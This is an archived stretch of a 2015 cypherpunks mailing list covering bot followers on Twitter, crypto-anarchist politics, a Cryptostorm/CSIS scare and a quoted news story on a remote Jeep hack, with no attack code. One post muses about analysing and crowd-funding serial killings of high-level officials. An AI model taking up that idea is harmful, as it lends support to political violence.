it.
Maybe in the > original Russian it was coherent. It makes you wonder how many posts here are actually the output of Markov chain generators trained on vintage 90's mailing list archives or declassified COINTELPRO files or something. - -- The Doctor [412/724/301/703/415] [ZS] PGP: 0x807B17C1 / 7960 1CDC 85C9 0B63 8D9F DD89 3BD8 FF2B 807B 17C1 WWW: https://drwho.virtadpt.net/ Eve was framed! -----BEGIN PGP SIGNATURE----- -----END PGP SIGNATURE----- From alfiej at fastmail.fm Tue Jul 21 17:16:09 2015 From: alfiej at fastmail.fm (Alfie John) Date: Wed, 22 Jul 2015 10:16:09 +1000 Subject: an ominous comment In-Reply-To: <55AED624.4090208@lig.net> References: <20150714155203.826F52282E2@palinka.tinho.net> <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> <55AA8B5E.1040202@lig.net> <55ad62b8.8915370a.20276.ffffa5a6@mx.google.com> <55AD6DF7.50903@lig.net> <55AD8704.8070104@pilobilus.net> <55adc555.0ae88c0a.425f.3132@mx.google.com> <55ADCC69.1060207@lig.net> <55add913.121c8d0a.89df3.1748@mx.google.com> <55ADF184.9070004@lig.net> <55AED624.4090208@lig.net> Message-ID: <1437524169.568880.329705825.556F643B@webmail.messagingengine.com> On Wed, Jul 22, 2015, at 09:30 AM, Stephen D.
Williams wrote: > Even when the US meddled, except for a very few circumstances, it was > to achieve something useful, Useful to whom? Not to the Chagossians of Diego Garcia in the 60s and 70s. FFS, the _whole population_ was kicked off the island. > not to subjugate peoples for colonies Maybe you should read: https://en.wikipedia.org/wiki/Depopulation_of_Chagossians_from_the_Chagos_Archipelago > provides lots of protection and other benefits, and generally attempts > to fit in and be respectful. You should stop drinking the Koolaid. It's funny how so many patriots love the country they happened to have been born in. Alfie -- Alfie John alfiej at fastmail.fm From drwho at virtadpt.net Wed Jul 22 10:39:28 2015 From: drwho at virtadpt.net (The Doctor) Date: Wed, 22 Jul 2015 10:39:28 -0700 Subject: In-Reply-To: <55AFCBE2.9010500@riseup.net> References: <55AFCBE2.9010500@riseup.net> Message-ID: <55AFD550.6030109@virtadpt.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 On 07/22/2015 09:59 AM, Razer wrote: > I get these sorts of follows whenever I hashtag #NSA or use @FBI. I > got It would be interesting to use Twitter's back-end API to (automagickally) gather information on new follows and see what shakes out. - -- The Doctor [412/724/301/703/415] [ZS] PGP: 0x807B17C1 / 7960 1CDC 85C9 0B63 8D9F DD89 3BD8 FF2B 807B 17C1 WWW: https://drwho.virtadpt.net/ Eve was framed!
-----BEGIN PGP SIGNATURE----- -----END PGP SIGNATURE----- From reed at unsafeword.org Wed Jul 22 16:11:29 2015 From: reed at unsafeword.org (Reed Black) Date: Wed, 22 Jul 2015 16:11:29 -0700 Subject: In-Reply-To: References: Message-ID: If you look at people who have a large number of followers which their activity or identity wouldn't normally warrant, you will find that the synthetic accounts who follow them exhibit a lot of random retweeting and favoriting behavior. Many of the synthetic accounts also do double duty by posting spam links should anyone visit them. All speculation, but: There are people who offer paid follower, favoriting, and retweeting services. I suspect the operators include more bogus activity than paid activity on the synthetic accounts. The additional activity would muddy any third-party analysis. For example, it would make it harder for Twitter to spot bogus accounts. It would also be harder to know who's really paying for artificial activity versus who's been randomly selected (if Twitter even cares about such things). If the crap favoriting gets these accounts some non-synthetic followers or visits, they also become useful vehicles for those spam links.
It's doubtful that Twitter worries as much about accounts that spam if people visit the account after a favorite and see a spam link, rather than the spammer revealing the spam to others with @mentions. On Sun, Jul 19, 2015 at 6:10 PM, coderman wrote: > joined the twitters recently, > noticed that many of my posts attract "favorite'ers" > > who are honey pots. E.g.: > - https://twitter.com/AudreySykestfm > - https://twitter.com/EvelynHarri0pp > - https://twitter.com/PenelopeRosap8 > - https://twitter.com/AdalynEsteskul > - https://twitter.com/PazhetnykhMiss > - https://twitter.com/helensmithusacc > - https://twitter.com/RubyFlemingdy5 > - https://twitter.com/KaelynMorenm2g > - https://twitter.com/PeytonKanee97 > - https://twitter.com/LilyArnoldvkm > > maybe social research, or ... ? i guess they think i've got a type :P > > > best regards, > not interested codermange > From reed at unsafeword.org Wed Jul 22 16:15:55 2015 From: reed at unsafeword.org (Reed Black) Date: Wed, 22 Jul 2015 16:15:55 -0700 Subject: In-Reply-To: References: <55AC5B26.8050100@pobox.com> Message-ID: From discussion elsewhere, there was agreement that if you routinely block spammers and junk favoriters the activity rapidly falls off. With the official twitter site and most clients, if you report abuse you also block the reported party. If the bot operator periodically checks whether it's blocked after favoriting or @mentioning, they would build up a list of who's best left alone. Their goals would include going unnoticed by Twitter governance. Anyone they can detect as blocking their accounts can be assumed to also be reporting the accounts. On Sun, Jul 19, 2015 at 10:31 PM, coderman wrote: > does this taper off? or just a constant stream of noise... >
From juan.g71 at gmail.com Wed Jul 22 13:00:41 2015 From: juan.g71 at gmail.com (Juan) Date: Wed, 22 Jul 2015 17:00:41 -0300 Subject: an ominous comment In-Reply-To: <1588252.tKBBYif51o@lapuntu> References: <20150714155203.826F52282E2@palinka.tinho.net> <55AD8704.8070104@pilobilus.net> <55adc555.0ae88c0a.425f.3132@mx.google.com> <1588252.tKBBYif51o@lapuntu> Message-ID: <55aff616.c61c8d0a.70803.760b@mx.google.com> On Wed, 22 Jul 2015 09:47:52 +0200 rysiek wrote: > On Tuesday, 21 July 2015 01:07:55 Juan wrote: > > Hey. *Now* I get it. > > > > This mailing list has a lot of tor-tards who are apologists > > of the pentagon's propaganda and spying efforts. > > Well, I wouldn't call you a "tor-tard", but if you insist... I'm not following. From juan.g71 at gmail.com Wed Jul 22 15:03:24 2015 From: juan.g71 at gmail.com (Juan) Date: Wed, 22 Jul 2015 19:03:24 -0300 Subject: an ominous comment In-Reply-To: References: <20150714155203.826F52282E2@palinka.tinho.net> <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> <55AA8B5E.1040202@lig.net> <55ad62b8.8915370a.20276.ffffa5a6@mx.google.com> <55AD6DF7.50903@lig.net> <55AD8704.8070104@pilobilus.net> <55adc555.0ae88c0a.425f.3132@mx.google.com> <55ADCC69.1060207@lig.net> <55add913.121c8d0a.89df3.1748@mx.google.com> <55ADF184.9070004@lig.net> <55AE10C2.6050501@pilobilus.net> <55ae9473.d8ea8c0a.b49bb.ffff9972@mx.google.com> <51A031B8-7E9C-4D04-8ADF-6DDDE1F39296@obscura.com> Message-ID: <55b012da.940f370a.9e74.ffff8a97@mx.google.com> On Tue, 21 Jul 2015 20:49:31 -0700 Seth wrote: > http://onlyinamericablogging.blogspot.jp/2011/03/robert-manne-julian-assange-cypherpunk.html > > > > > Almost all cypherpunks were anarchists who regarded the state as the > enemy. Most but not all were anarchists of the Right, or in American > parlance, libertarians, who supported laissez-faire capitalism.
That's for the people who didn't get the memo. (Oops. I just picked up the expression from Zenaan. I hope he doesn't sue me) Now, here's another important memo : Firms like gaagle, bank of amerikkka, amerikkka online, etc, are textbook examples of corporatism, mercantilism and, given their support for the american fascist state, they can be classed as outright fascist. (American) big businesses have NOTHING to do with "free market capitalism". Interestingly enough both anti-libertarians and fake libertarians like to pretend that big fascist businesses are justified by libertarian philosophy. > The cypherpunks formed a house of many rooms. The only > thing they all shared was an understanding of the political > significance of cryptography and the willingness to fight for privacy > and unfettered freedom in cyberspace. A flawed understanding it seems. > > From admin at pilobilus.net Wed Jul 22 16:19:38 2015 From: admin at pilobilus.net (Steve Kinney) Date: Wed, 22 Jul 2015 19:19:38 -0400 Subject: an ominous comment In-Reply-To: <55b012da.940f370a.9e74.ffff8a97@mx.google.com> References: <20150714155203.826F52282E2@palinka.tinho.net> <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> <55AA8B5E.1040202@lig.net> <55ad62b8.8915370a.20276.ffffa5a6@mx.google.com> <55AD6DF7.50903@lig.net> <55AD8704.8070104@pilobilus.net> <55adc555.0ae88c0a.425f.3132@mx.google.com> <55ADCC69.1060207@lig.net> <55add913.121c8d0a.89df3.1748@mx.google.com> <55ADF184.9070004@lig.net> <55AE10C2.6050501@pilobilus.net> <55ae9473.d8ea8c0a.b49bb.ffff9972@mx.google.com> <51A031B8-7E9C-4D04-8ADF-6DDDE1F39296@obscura.com> <55b012da.940f370a.9e74.ffff8a97@mx.google.com> Message-ID: <55B0250A.4040000@pilobilus.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On 07/22/2015 06:03 PM, Juan wrote: >> The cypherpunks formed a house of many rooms. 
The only thing >> they all shared was an understanding of the political >> significance of cryptography and the willingness to fight for >> privacy and unfettered freedom in cyberspace. > > A flawed understanding it seems. Oi, group identity in any anarchist-friendly venue can't be enforced by any kind of coercive authority, else it is not an anarchist-friendly venue. Fighting over the definition of the group is only fun until somebody wins. :o) -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 -----END PGP SIGNATURE----- From juan.g71 at gmail.com Wed Jul 22 16:33:33 2015 From: juan.g71 at gmail.com (Juan) Date: Wed, 22 Jul 2015 20:33:33 -0300 Subject: an ominous comment In-Reply-To: <55B0250A.4040000@pilobilus.net> References: <20150714155203.826F52282E2@palinka.tinho.net> <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> <55AA8B5E.1040202@lig.net> <55ad62b8.8915370a.20276.ffffa5a6@mx.google.com> <55AD6DF7.50903@lig.net> <55AD8704.8070104@pilobilus.net> <55adc555.0ae88c0a.425f.3132@mx.google.com> <55ADCC69.1060207@lig.net> <55add913.121c8d0a.89df3.1748@mx.google.com> <55ADF184.9070004@lig.net> <55AE10C2.6050501@pilobilus.net> <55ae9473.d8ea8c0a.b49bb.ffff9972@mx.google.com>
<51A031B8-7E9C-4D04-8ADF-6DDDE1F39296@obscura.com> <55b012da.940f370a.9e74.ffff8a97@mx.google.com> <55B0250A.4040000@pilobilus.net> Message-ID: <55b027fc.95968c0a.2906.ffff94f8@mx.google.com> On Wed, 22 Jul 2015 19:19:38 -0400 Steve Kinney wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > On 07/22/2015 06:03 PM, Juan wrote: > > >> The cypherpunks formed a house of many rooms. The only thing > >> they all shared was an understanding of the political > >> significance of cryptography and the willingness to fight for > >> privacy and unfettered freedom in cyberspace. > > > > A flawed understanding it seems. > > Oi, group identity in any anarchist-friendly venue can't be > enforced by any kind of coercive authority, else it is not an > anarchist-friendly venue. Fighting over the definition of the > group is only fun until somebody wins. Apologies, my last remark wasn't too clear. "understanding of the political significance of cryptography" What I meant is that cypherpunks seem to put too much emphasis on the political benefits and 'significance' of crypto when in reality crypto doesn't really solve political problems.
> > :o) > > > > -----BEGIN PGP SIGNATURE----- > Version: GnuPG v1 > > -----END PGP SIGNATURE----- From juan.g71 at gmail.com Wed Jul 22 17:24:07 2015 From: juan.g71 at gmail.com (Juan) Date: Wed, 22 Jul 2015 21:24:07 -0300 Subject: an ominous comment In-Reply-To: <55B0250A.4040000@pilobilus.net> References: <20150714155203.826F52282E2@palinka.tinho.net> <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> <55AA8B5E.1040202@lig.net> <55ad62b8.8915370a.20276.ffffa5a6@mx.google.com> <55AD6DF7.50903@lig.net> <55AD8704.8070104@pilobilus.net> <55adc555.0ae88c0a.425f.3132@mx.google.com> <55ADCC69.1060207@lig.net> <55add913.121c8d0a.89df3.1748@mx.google.com> <55ADF184.9070004@lig.net> <55AE10C2.6050501@pilobilus.net> <55ae9473.d8ea8c0a.b49bb.ffff9972@mx.google.com> <51A031B8-7E9C-4D04-8ADF-6DDDE1F39296@obscura.com> <55b012da.940f370a.9e74.ffff8a97@mx.google.com> <55B0250A.4040000@pilobilus.net> Message-ID: <55b033d7.4e2b370a.c84ab.ffff9d27@mx.google.com> " 1.5.1. "Why is this FAQ not in Mosaic form?"
- because the author (tcmay, as of 7/94) does not have Mosaic access," From juan.g71 at gmail.com Wed Jul 22 17:57:50 2015 From: juan.g71 at gmail.com (Juan) Date: Wed, 22 Jul 2015 21:57:50 -0300 Subject: an ominous comment In-Reply-To: <34331402.852758.1437610430236.JavaMail.yahoo@mail.yahoo.com> References: <55b027fc.95968c0a.2906.ffff94f8@mx.google.com> <34331402.852758.1437610430236.JavaMail.yahoo@mail.yahoo.com> Message-ID: <55b03bbf.64538c0a.771e.ffff9df0@mx.google.com> On Thu, 23 Jul 2015 00:13:50 +0000 (UTC) jim bell : > >   What I meant is that cypherpunks seem to put too much > >   emphasis on the political benefits and 'significance' of > >   crypto when in reality crypto doesn't really solve political > >    problems. > > > Not yet, anyway.        Jim Bell I wish I shared your optimism(?) Jim, but I'm a tad skeptical at the moment. Cheers ;) >         > > > > From odinn.cyberguerrilla at riseup.net Wed Jul 22 22:14:28 2015 From: odinn.cyberguerrilla at riseup.net (odinn) Date: Wed, 22 Jul 2015 22:14:28 -0700 Subject: Message of Concern re. CSIS action sent from Cryptostorm Message-ID: <55B07834.1000605@riseup.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hello, A tweet was sent out from Cryptostorm concerning one of their staff who was apparently taken away by the CSIS: https://twitter.com/cryptostorm_is/status/624070397219180544 The text of the tweet: "Core cryptostorm team member @grazestorm is currently held hostage by rogue CSIS agents. Not a joke. Deadly serious. Please copy/RT broadly." The tweet was timestamped 9:15 PM - 22 Jul 2015 For reference, the CSIS is the Canadian Security Intelligence Service. Please keep eyes on @cryptostorm_is twitter feed and provide them with moral and any other support you deem appropriate. Cryptostorm are good people. 
- -O

- --
http://abis.io ~
"a protocol concept to enable decentralization
and expansion of a giving economy, and a new social good"
https://keybase.io/odinn

From juan.g71 at gmail.com Wed Jul 22 18:27:10 2015
From: juan.g71 at gmail.com (Juan)
Date: Wed, 22 Jul 2015 22:27:10 -0300
Subject: interwebs trivia
Message-ID: <55b0429d.8def8c0a.4a227.ffff9f41@mx.google.com>

"2.13.1. "What is Crypto Anarchy?"
- Some of us believe various forms of strong cryptography will cause the power of the state to decline, perhaps even collapse fairly abruptly. We believe the expansion into cyberspace, with secure communications, digital money, anonymity and pseudonymity, and other crypto-mediated interactions, will profoundly change the nature of economies and social interactions."

TM

-----------------------

"The world is not sliding, but galloping into a new transnational dystopia. This development has not been properly recognized outside of national security circles. It has been hidden by secrecy, complexity and scale. The internet, our greatest tool of emancipation, has been transformed into the most dangerous facilitator of totalitarianism we have ever seen. The internet is a threat to human civilization."

JA

From rich at openwatch.net Wed Jul 22 22:49:29 2015
From: rich at openwatch.net (Rich Jones)
Date: Wed, 22 Jul 2015 22:49:29 -0700
Subject: HORNET: High-speed Onion Routing at the Network Layer
Message-ID:

No PoC published yet, but interesting work on a new high speed router based anonymity network.

"We present HORNET, a system that enables high-speed end-to-end anonymous channels by leveraging next generation network architectures. HORNET is designed as a low-latency onion routing system that operates at the network layer thus enabling a wide range of applications. Our system uses only symmetric cryptography for data forwarding yet requires no per-flow state on intermediate nodes. This design enables HORNET nodes to process anonymous traffic at over 93 Gb/s. HORNET can also scale as required, adding minimal processing overhead per additional anonymous channel. We discuss design and implementation details, as well as a performance and security evaluation."

http://arxiv.org/pdf/1507.05724v1.pdf

Another subtle but slightly interesting tweak to the threat model in post-Snowden anonymity papers - increased difficulty of upholding a global political conspiracy is now explicitly mentioned as a layer of defense (7.3).

R

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: text/html
Size: 1465 bytes
Desc: not available
URL:

From rysiek at hackerspace.pl Wed Jul 22 15:01:34 2015
From: rysiek at hackerspace.pl (rysiek)
Date: Thu, 23 Jul 2015 00:01:34 +0200
Subject:
In-Reply-To: <55AFCBE2.9010500@riseup.net>
References: <55AFCBE2.9010500@riseup.net>
Message-ID: <14379325.OXAP0zpybx@lapuntu>

On Wednesday, 22 July 2015 09:59:14 Razer wrote:
> My 'follow-stalkers' are typically 'girls' posting various types of pron
> interspersed with tweets about a variety of subjects where I inevitably
> end up seeing the same tweets across the various accounts. Many of the
> links posted, when not to pron sites go to 'humorous photo gallery'
> sites, of which most seem to be hosted by... Wait for it, Cloudflare.

This seems like something that might be worth documenting and datamining, maybe?
--
Regards,
Michał "rysiek" Woźniak

I am changing my GPG key :: http://rys.io/pl/147
GPG Key Transition :: http://rys.io/en/147

-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 931 bytes
Desc: This is a digitally signed message part.
URL:

From jdb10987 at yahoo.com Wed Jul 22 17:13:50 2015
From: jdb10987 at yahoo.com (jim bell)
Date: Thu, 23 Jul 2015 00:13:50 +0000 (UTC)
Subject: an ominous comment
In-Reply-To: <55b027fc.95968c0a.2906.ffff94f8@mx.google.com>
References: <55b027fc.95968c0a.2906.ffff94f8@mx.google.com>
Message-ID: <34331402.852758.1437610430236.JavaMail.yahoo@mail.yahoo.com>

From: Juan
On Wed, 22 Jul 2015 19:19:38 -0400 Steve Kinney wrote:
>> On 07/22/2015 06:03 PM, Juan wrote:
>>
>> >> The cypherpunks formed a house of many rooms. The only thing
>> >> they all shared was an understanding of the political
> >> significance of cryptography and the willingness to fight for
>> >> privacy and unfettered freedom in cyberspace.
> >>
> >> A flawed understanding it seems.
> >> Oi, group identity in any anarchist-friendly venue can't be
>> enforced by any kind of coercive authority, else it is not an
>> anarchist-friendly venue. Fighting over the definition of the
>> group is only fun until somebody wins.
> What I meant is that cypherpunks seem to put too much
> emphasis on the political benefits and 'significance' of
> crypto when in reality crypto doesn't really solve political
> problems.

Not yet, anyway.        Jim Bell

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: text/html
Size: 2611 bytes
Desc: not available
URL:

From rysiek at hackerspace.pl Wed Jul 22 17:01:57 2015
From: rysiek at hackerspace.pl (rysiek)
Date: Thu, 23 Jul 2015 02:01:57 +0200
Subject: an ominous comment
In-Reply-To: <55b027fc.95968c0a.2906.ffff94f8@mx.google.com>
References: <20150714155203.826F52282E2@palinka.tinho.net> <55B0250A.4040000@pilobilus.net> <55b027fc.95968c0a.2906.ffff94f8@mx.google.com>
Message-ID: <4158242.f1PXDUlRlp@lapuntu>

On Wednesday, 22 July 2015 20:33:33 Juan wrote:
> On Wed, 22 Jul 2015 19:19:38 -0400
>
> Steve Kinney wrote:
> > -----BEGIN PGP SIGNED MESSAGE-----
> > Hash: SHA1
> >
> > On 07/22/2015 06:03 PM, Juan wrote:
> > >> The cypherpunks formed a house of many rooms. The only thing
> > >> they all shared was an understanding of the political
> > >> significance of cryptography and the willingness to fight for
> > >> privacy and unfettered freedom in cyberspace.
> > >
> > > A flawed understanding it seems.
> >
> > Oi, group identity in any anarchist-friendly venue can't be
> > enforced by any kind of coercive authority, else it is not an
> > anarchist-friendly venue. Fighting over the definition of the
> > group is only fun until somebody wins.
>
> Apologies, my last remark wasn't too clear.
>
> > "understanding of the political significance of cryptography"
>
> What I meant is that cypherpunks seem to put too much
> emphasis on the political benefits and 'significance' of
> crypto when in reality crypto doesn't really solve political
> problems.

There is a world of difference between "A is politically significant" and "A solves political problems".

Try religion. Religion is absurdly politically significant, but I wager we can all agree it doesn't really *solve* political problems.

--
Regards,
Michał "rysiek" Woźniak

I am changing my GPG key :: http://rys.io/pl/147
GPG Key Transition :: http://rys.io/en/147

-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 931 bytes
Desc: This is a digitally signed message part.
URL:

From oshwm at openmailbox.org Thu Jul 23 00:45:00 2015
From: oshwm at openmailbox.org (oshwm)
Date: Thu, 23 Jul 2015 08:45:00 +0100
Subject: Message of Concern re. CSIS action sent from Cryptostorm
In-Reply-To: <55B07834.1000605@riseup.net>
References: <55B07834.1000605@riseup.net>
Message-ID: <0BA33818-BB04-4C82-834C-286349F65222@openmailbox.org>

He's back online now, some explaining from cryptostorm soon I hope :)

On 23 July 2015 06:14:28 BST, odinn wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>Hash: SHA1
>
>Hello,
>
>A tweet was sent out from Cryptostorm concerning one of their staff
>who was apparently taken away by the CSIS:
>
>https://twitter.com/cryptostorm_is/status/624070397219180544
>
>The text of the tweet:
>
>"Core cryptostorm team member @grazestorm is currently held hostage by
>rogue CSIS agents. Not a joke. Deadly serious. Please copy/RT broadly."
>
>The tweet was timestamped 9:15 PM - 22 Jul 2015
>
>For reference, the CSIS is the Canadian Security Intelligence Service.
>
>Please keep eyes on @cryptostorm_is twitter feed and provide them with
>moral and any other support you deem appropriate. Cryptostorm are
>good people.
>
>- -O
>
>- --
>http://abis.io ~
>"a protocol concept to enable decentralization
>and expansion of a giving economy, and a new social good"
>https://keybase.io/odinn

From Rayzer at riseup.net Thu Jul 23 10:29:34 2015
From: Rayzer at riseup.net (Razer)
Date: Thu, 23 Jul 2015 10:29:34 -0700
Subject:
In-Reply-To: <14379325.OXAP0zpybx@lapuntu>
References: <55AFCBE2.9010500@riseup.net> <14379325.OXAP0zpybx@lapuntu>
Message-ID: <55B1247E.7040305@riseup.net>

On 07/22/2015 03:01 PM, rysiek wrote:
> On Wednesday, 22 July 2015 09:59:14 Razer wrote:
>> My 'follow-stalkers' are typically 'girls' posting various types of pron
>> interspersed with tweets about a variety of subjects where I inevitably
>> end up seeing the same tweets across the various accounts. Many of the
>> links posted, when not to pron sites go to 'humorous photo gallery'
>> sites, of which most seem to be hosted by... Wait for it, Cloudflare.
> This seems like something that might be worth documenting and datamining,
> maybe?
>

I've thought about doing a more thorough correlation study. For all I know there are clues in it about the originators.

For example. Some of the correlated tweets across accounts contained (anatomical) 'colon problem' tweets. Suppose some NSA analyst somewhere has "Irritable Bowel Syndrome", and they're telegraphing it subconsciously in their choice of tweets?

RR

-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 819 bytes
Desc: OpenPGP digital signature
URL:

From oshwm at openmailbox.org Thu Jul 23 02:42:28 2015
From: oshwm at openmailbox.org (oshwm)
Date: Thu, 23 Jul 2015 10:42:28 +0100
Subject: Message of Concern re. CSIS action sent from Cryptostorm
In-Reply-To: <2145836.D1Zn44RHbJ@lapuntu>
References: <55B07834.1000605@riseup.net> <0BA33818-BB04-4C82-834C-286349F65222@openmailbox.org> <2145836.D1Zn44RHbJ@lapuntu>
Message-ID: <0E85854D-F000-4A63-9752-283A9F84F024@openmailbox.org>

Cryptostorm official Twitter account has acknowledged that Grazestorm is safe and well. It appears to be some sort of internal misunderstanding which Cryptostorm say they'll possibly publish details about via their forums when they've worked out the details.

cheers,
oshwm.

On 23 July 2015 09:43:47 BST, rysiek wrote:
>On Thursday, 23 July 2015 08:45:00 oshwm wrote:
>> He's back online now, some explaining from cryptostorm soon I hope :)
>
>Keeping the non-twittering among us up to date on this would be highly
>appreciated. :)

From rysiek at hackerspace.pl Thu Jul 23 01:43:47 2015
From: rysiek at hackerspace.pl (rysiek)
Date: Thu, 23 Jul 2015 10:43:47 +0200
Subject: Message of Concern re. CSIS action sent from Cryptostorm
In-Reply-To: <0BA33818-BB04-4C82-834C-286349F65222@openmailbox.org>
References: <55B07834.1000605@riseup.net> <0BA33818-BB04-4C82-834C-286349F65222@openmailbox.org>
Message-ID: <2145836.D1Zn44RHbJ@lapuntu>

On Thursday, 23 July 2015 08:45:00 oshwm wrote:
> He's back online now, some explaining from cryptostorm soon I hope :)

Keeping the non-twittering among us up to date on this would be highly appreciated. :)

--
Regards,
Michał "rysiek" Woźniak

I am changing my GPG key :: http://rys.io/pl/147
GPG Key Transition :: http://rys.io/en/147

-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 931 bytes
Desc: This is a digitally signed message part.
URL:

From drwho at virtadpt.net Thu Jul 23 10:46:08 2015
From: drwho at virtadpt.net (The Doctor)
Date: Thu, 23 Jul 2015 10:46:08 -0700
Subject:
In-Reply-To: <14379325.OXAP0zpybx@lapuntu>
References: <55AFCBE2.9010500@riseup.net> <14379325.OXAP0zpybx@lapuntu>
Message-ID: <55B12860.2060601@virtadpt.net>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

On 07/22/2015 03:01 PM, rysiek wrote:
> This seems like something that might be worth documenting and
> datamining, maybe?

Somebody seems to be keeping an eye on this mailing list - I just had to ban a half-dozen that followed me within about a five minute span.

- --
The Doctor [412/724/301/703/415] [ZS]

PGP: 0x807B17C1 / 7960 1CDC 85C9 0B63 8D9F DD89 3BD8 FF2B 807B 17C1
WWW: https://drwho.virtadpt.net/

One if by land, two if by sea, three if by interdimensional teleportation.

From drwho at virtadpt.net Thu Jul 23 10:49:30 2015
From: drwho at virtadpt.net (The Doctor)
Date: Thu, 23 Jul 2015 10:49:30 -0700
Subject: Message of Concern re.
CSIS action sent from Cryptostorm
In-Reply-To: <2145836.D1Zn44RHbJ@lapuntu>
References: <55B07834.1000605@riseup.net> <0BA33818-BB04-4C82-834C-286349F65222@openmailbox.org> <2145836.D1Zn44RHbJ@lapuntu>
Message-ID: <55B1292A.6060102@virtadpt.net>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

On 07/23/2015 01:43 AM, rysiek wrote:
> Keeping the non-twittering among us up to date on this would be
> highly appreciated. :)

https://twitter.com/cryptostorm_is/status/624126386601611264

It is happy news indeed to report @grazestorm is safe; underlying circumstances being clarified, & steps taken to prevent future attempts.

https://twitter.com/cryptostorm_is/status/624126912399548417

We shall post additional details - via @keybase signed essay - in forum once the dust has observably settled, legitimately, in this matter.

- --
The Doctor [412/724/301/703/415] [ZS]

PGP: 0x807B17C1 / 7960 1CDC 85C9 0B63 8D9F DD89 3BD8 FF2B 807B 17C1
WWW: https://drwho.virtadpt.net/

One if by land, two if by sea, three if by interdimensional teleportation.

From dan at geer.org Thu Jul 23 21:37:58 2015
From: dan at geer.org (dan at geer.org)
Date: Fri, 24 Jul 2015 00:37:58 -0400
Subject: an ominous comment
In-Reply-To: Your message of "Wed, 22 Jul 2015 10:16:09 +1000." <1437524169.568880.329705825.556F643B@webmail.messagingengine.com>
Message-ID: <20150724043758.70036228118@palinka.tinho.net>

| It's funny how so many patriots love the country they happened to have
| been born in.
http://ebooks.library.cornell.edu/cgi/t/text/pageviewer-idx?c=atla;cc=atla;rgn=full%20text;idno=atla0012-5;didno=atla0012-5;view=image;seq=0671;node=atla0012-5%3A1

ymmv,
--dan

From grarpamp at gmail.com Thu Jul 23 23:05:06 2015
From: grarpamp at gmail.com (grarpamp)
Date: Fri, 24 Jul 2015 02:05:06 -0400
Subject: an ominous comment
In-Reply-To: <34331402.852758.1437610430236.JavaMail.yahoo@mail.yahoo.com>
References: <55b027fc.95968c0a.2906.ffff94f8@mx.google.com> <34331402.852758.1437610430236.JavaMail.yahoo@mail.yahoo.com>
Message-ID:

On Wed, Jul 22, 2015 at 8:13 PM, jim bell wrote:
>> What I meant is that cypherpunks seem to put too much
>> emphasis on the political benefits and 'significance' of
>> crypto when in reality crypto doesn't really solve political
>> problems.
>
> Not yet, anyway.

What examples in history are there of long strings of (say five or more) targeted knockoffs of assorted high level types (be they among Govt or Corp)? Analysis of the leadup situation surrounding those may be predictor for the next. And may indicate whether money was sole, primary, simply grease, or no relation. And if related were they single, group, or crowd funded.

From shelley at misanthropia.org Fri Jul 24 05:53:55 2015
From: shelley at misanthropia.org (Shelley)
Date: Fri, 24 Jul 2015 05:53:55 -0700
Subject: Hackers Remotely Kill a Jeep on the Highway
In-Reply-To: <9A043F3CF02CD34C8E74AC1594475C73AB06CBD8@uxcn10-tdc05.UoA.auckland.ac.nz>
References: <20150724120211.GA2562@sivokote.iziade.m$> <9A043F3CF02CD34C8E74AC1594475C73AB06CBD8@uxcn10-tdc05.UoA.auckland.ac.nz>
Message-ID: <20150724125338.94C53C00017@frontend1.nyi.internal>

On July 24, 2015 5:25:18 AM Peter Gutmann wrote:
> Georgi Guninski writes:
>
> >http://www.wired.com/2015/07/hackers-remotely-kill-jeep-highway/
> >
> >I was driving 70 mph on the edge of downtown St. Louis when the exploit
> >began to take hold.
> .
> I remember saying something like "I feel a bit lightheaded; maybe you should
> drive..."
And suddenly there was a terrible roar all around us and the sky was
> full of what looked like huge bats, all swooping and screeching and diving
> around the car, which was going about a hundred miles an hour with the top
> down. And a voice was screaming: "Holy Jesus! What are these goddamn
> animals?"
>
> Peter.

Nicely done!

-S

From shelley at misanthropia.org Fri Jul 24 06:04:54 2015
From: shelley at misanthropia.org (Shelley)
Date: Fri, 24 Jul 2015 06:04:54 -0700
Subject: Hackers Remotely Kill a Jeep on the Highway
In-Reply-To: <14ec0294ce8.276e.4d489027c0c4d0c1b1ca03a1f48f1ffb@misanthropia.org>
References: <20150724120211.GA2562@sivokote.iziade.m$> <14ec0294ce8.276e.4d489027c0c4d0c1b1ca03a1f48f1ffb@misanthropia.org>
Message-ID: <20150724130438.4E76DC00014@frontend1.nyi.internal>

On July 24, 2015 5:13:46 AM Georgi Guninski wrote:
> Not sure if this is true:
>
> http://www.wired.com/2015/07/hackers-remotely-kill-jeep-highway/
>
> I was driving 70 mph on the edge of downtown St. Louis when the exploit
> began to take hold.
> ...
> Though I hadn’t touched the dashboard, the vents in the Jeep Cherokee
> started blasting cold air at the maximum setting, chilling the sweat on
> my back through the in-seat climate control system. Next the radio
> switched to the local hip hop station and began blaring Skee-lo at full
> volume. I spun the control knob left and hit the power button, to no
> avail. Then the windshield wipers turned on, and wiper fluid blurred the
> glass.
> ...
> The result of their work was a hacking technique—what the security
> industry calls a zero-day exploit—that can target Jeep Cherokees and
> give the attacker wireless control, via the Internet, to any of
> thousands of vehicles.
> ...
> I mentally congratulated myself on my courage under pressure. That’s
> when they cut the transmission.
>
> Immediately my accelerator stopped working.
>
>

It's true. This isn't the first time these guys have demonstrated this kind of exploit.
